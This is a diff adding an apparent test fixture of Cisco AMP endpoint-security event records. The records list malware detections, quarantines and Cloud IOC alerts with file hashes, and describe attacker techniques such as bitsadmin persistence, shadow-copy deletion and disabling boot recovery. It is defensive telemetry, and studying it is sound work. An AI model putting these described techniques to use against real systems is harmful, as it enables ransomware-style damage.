@@ -0,0 +1,49 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a
8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5
e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. 
While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. 
This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. 
Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. 
Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. 
This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch 
